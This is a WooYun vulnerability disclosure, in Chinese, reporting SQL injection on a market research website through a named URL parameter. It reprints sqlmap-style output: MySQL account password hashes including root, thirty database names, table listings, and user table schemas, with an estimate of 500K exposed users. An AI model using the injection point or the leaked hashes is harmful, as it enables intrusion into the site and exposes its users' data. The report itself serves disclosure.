当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0194624

漏洞标题:市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

相关厂商:市场研究信息网

漏洞作者: Exploit DB

提交时间:2016-04-11 09:39

修复时间:2016-05-26 09:40

公开时间:2016-05-26 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国市场调研第一门户网站 影响30库

详细说明:

http://app.3see.com/job/public/post.php?pid=2960


database management system users password hashes:
[*] 3seeroot [3]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
password hash: *DF23C7658CA68A644959B4DE7C7A0E12328F94BD
password hash: *E30B1F9102F0C1B751E96316EF6C2A859436EC5C
[*] ailon [1]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] cti_fbxt [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] doosan [1]:
password hash: *02839BAECB5BEB57BE071190FF2E70701BF66FB1
[*] fbxt [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] pureftpd [1]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] root [1]:
password hash: *2D788DA8CDAE073D0DDB453E628EA003D8CDE85C
[*] skw [1]:
password hash: *FC60E807774B9731F82DBC0CDA1159DC6494C95D
[*] wyt [1]:
password hash: *64DF5C732B2AD96E34B95E4571C54011D342D7E5


QQ截图20160403232405.png


影响30库

available databases [30]:
[*] 3see
[*] 3seedb
[*] 3seeforum
[*] ailon
[*] air
[*] bbs
[*] bbs7vuchome
[*] blog
[*] boblog
[*] cti_fbxt
[*] discuz
[*] doosan
[*] fbxt
[*] fenghui
[*] fenghui08
[*] info
[*] information_schema
[*] kstory
[*] mysql
[*] mysql__
[*] new3see
[*] newyearwork
[*] pku_bbs
[*] pureftpd
[*] reportdata
[*] sgbbs
[*] sgblog
[*] skw_bbs
[*] skw_member
[*] space


当前数据库没有多少数据 1000+而已

Database: 3see
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| t_makepagelog | 247155 |
| cms_data_comment | 145038 |
| payreport | 24432 |
| cms_data | 22338 |
| cms_create_log | 16043 |
| cojob_inbox | 12335 |
| t_filelog | 8966 |
| call_datasheet | 8525 |
| myjob_edu | 6382 |
| stat_sheet3see | 6305 |
| myjob_oldjob | 6298 |
| cms_data_picture | 6271 |
| myjob_resume | 5342 |
| freereports | 4061 |
| g_book | 3821 |
| myjob_item | 3250 |
| media_datasheet | 2890 |
| passwordtable | 2573 |
| manufacturer_new | 2498 |
| manufacturer | 2192 |
| cojob_place_new | 1798 |
| com_user | 1348 |
| members_homepage | 1331 |
| en_payreport | 1210 |
| com_manufacturer | 1117 |
| `3seecojob_coinfo` | 1112 |
| m_company | 1082 |
| m_user | 1069 |
| myjob_favorite | 968 |
| bidding | 773 |
| manu_art | 728 |
| com_homepages | 715 |
| com_bidding | 674 |
| com_book | 662 |
| orders | 633 |
| cms_page_module | 603 |
| cojob_store | 558 |
| myjob_city | 505 |
| myjob_letter | 489 |
| user_report | 435 |
| userdree | 433 |
| trainingtable | 393 |
| t_log | 391 |
| manu_art_pic | 366 |
| pv_stat | 354 |
| myjob_search | 346 |
| `3seemrarticle` | 342 |
| lib_mrarticle | 321 |
| mrconews | 319 |
| cms_topic_data | 318 |
| com_news | 297 |
| cojob_place | 256 |
| training | 246 |
| payreport_co | 192 |
| settlement | 152 |
| `3seesoftsurveyother` | 141 |
| newpic | 124 |
| company_job | 123 |
| diaocha2009 | 115 |
| myjob_mymsg | 113 |
| manu_friends | 104 |
| cms_page | 96 |
| new_hyclass | 96 |
| cms_data_type | 93 |
| library_datasheet | 90 |
| manufacturer_inform | 87 |
| cojob_deptandplace | 84 |
| cms_structure | 80 |
| t_menu | 71 |
| cojob_sessions | 65 |
| myjob_posttype | 63 |
| inquiry | 45 |
| p_commentary | 45 |
| ads_aditempic | 44 |
| cms_data_file | 38 |
| shclass | 36 |
| manufacturer_moban | 34 |
| training_qy_name | 33 |
| ads_aditem | 32 |
| advertisement | 30 |
| `3seehyclass` | 29 |
| adcategory | 29 |
| com_hyclass | 29 |
| m_admin | 24 |
| mrarticleclass | 24 |
| uparticle | 23 |
| com_uparticle | 22 |
| myjob_black | 20 |
| cati_literature | 16 |
| cms_topic | 16 |
| manufacturer_dongtai | 16 |
| mrarticle_neikan | 16 |
| cms_topic_comment | 15 |
| lib_topic | 14 |
| training_j | 14 |
| anli_down | 12 |
| cms_survey_item | 12 |
| mrarticle_zazhi | 12 |
| t_menuclass | 12 |
| t_power | 12 |
| trainingclass | 12 |
| cms_nextid | 11 |
| m_userinfo | 11 |
| manufacturer_anli | 11 |
| t_user | 11 |
| bytuijian | 10 |
| orderspayreport | 10 |
| ads_class | 9 |
| cms_default_module | 8 |
| com_seccanli | 8 |
| seccanli | 8 |
| training_xilie | 7 |
| com_anli | 6 |
| com_dongtai | 6 |
| cms_topic_group_type | 5 |
| cati_downloads | 4 |
| cati_softintro | 4 |
| cati_trends | 3 |
| cms_survey_main | 3 |
| cms_survey_position | 3 |
| manu_floatad | 3 |
| manufacturer_mbclass | 2 |
| cms_topic_group | 1 |
| tex | 1 |
| wytad_count | 1 |
+-----------------------+---------+


直接把管理员的表dump all 了吧

QQ截图20160403232405.png


看看其他的库

Database: 3seedb
[122 tables]
+-------------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advcaches |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_linkheader |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_virtualforums |
| cdb_warnings |
| cdb_words |
| textt |
+-------------------------+


39W+用户信息

QQ截图20160403232405.png


Database: 3seedb
Table: cdb_uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+---------------+-----------------------+
Database: 3seedb
Table: cdb_members
[48 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| accessmasks | tinyint(1) |
| adminid | tinyint(1) |
| avatarshowid | int(10) unsigned |
| bday | date |
| credits | int(10) |
| customaddfeed | tinyint(1) |
| customshow | tinyint(1) unsigned |
| dateformat | tinyint(1) |
| digestposts | smallint(6) unsigned |
| editormode | tinyint(1) unsigned |
| email | char(40) |
| extcredits1 | int(10) |
| extcredits2 | int(10) |
| extcredits3 | int(10) |
| extcredits4 | int(10) |
| extcredits5 | int(10) |
| extcredits6 | int(10) |
| extcredits7 | int(10) |
| extcredits8 | int(10) |
| extgroupids | char(20) |
| gender | tinyint(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastip | char(15) |
| lastpost | int(10) unsigned |
| lastvisit | int(10) unsigned |
| newsletter | tinyint(1) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | char(32) |
| pmsound | tinyint(1) |
| posts | mediumint(8) unsigned |
| ppp | tinyint(3) unsigned |
| prompt | tinyint(1) |
| regdate | int(10) unsigned |
| regip | char(15) |
| secques | char(8) |
| showemail | tinyint(1) |
| sigstatus | tinyint(1) |
| styleid | smallint(6) unsigned |
| timeformat | tinyint(1) |
| timeoffset | char(4) |
| tpp | tinyint(3) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
| xspacestatus | tinyint(1) |
+---------------+-----------------------+


Database: discuz
[53 tables]
+--------------------+
| cdb_access |
| cdb_adminactions |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_blogcaches |
| cdb_buddys |
| cdb_creditslog |
| cdb_failedlogins |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forums |
| cdb_medals |
| cdb_memberfields |
| cdb_members |
| cdb_moderators |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtypes |
| cdb_usergroups |
| cdb_validating |
| cdb_words |
+--------------------+


9W+用户信息

QQ截图20160403232405.png


Database: bbs
+------------------+---------+
| Table | Entries |
+------------------+---------+
| cdb_posts | 8084 |
| cdb_threads | 7461 |
| cdb_spacecaches | 2708 |
| cdb_memberfields | 543 |
| cdb_members | 543 |
| cdb_memberspaces | 542 |
| cdb_rsscaches | 461 |
| cdb_myposts | 258 |
| cdb_settings | 221 |
| cdb_mythreads | 126 |
| cdb_statvars | 75 |
| cdb_stylevars | 52 |
| cdb_stats | 50 |
| cdb_faqs | 34 |
| cdb_forumfields | 30 |
| cdb_forums | 29 |
| cdb_smilies | 29 |
| cdb_usergroups | 16 |
| cdb_crons | 13 |
| cdb_magics | 12 |
| cdb_projects | 11 |
| cdb_medals | 10 |
| cdb_bbcodes | 7 |
| cdb_onlinetime | 7 |
| cdb_ranks | 5 |
| cdb_onlinelist | 4 |
| cdb_admingroups | 3 |
| cdb_failedlogins | 1 |
| cdb_forumlinks | 1 |
| cdb_styles | 1 |
| cdb_templates | 1 |
+------------------+---------+


这里也有部分用户信息

QQ截图20160403232405.png


全部加起来应该有50W了

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)